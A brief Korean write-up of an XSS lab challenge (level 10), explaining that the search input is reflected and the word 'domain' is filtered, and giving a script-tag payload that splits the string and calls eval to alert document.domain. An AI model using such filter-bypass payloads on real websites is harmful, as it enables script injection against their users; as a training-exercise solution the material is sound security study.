XSS Challenge_Level10
Search에 입력을 받는다. 입력값은 입력 폼에 반사된다.
document.domain을 alert로 띄워야 하는데 domain 문자열이 필터링 된다.
"><script>var word = "document.do"+"main";alert(eval(word));</script> 로 문자열을 쪼개어 입력하면 필터링을 우회할 수 있다.
잘 들어간 것을 확인할 수 있다.
tags: writeup, xss, reflected xss, wstg-inpv-01, web hacking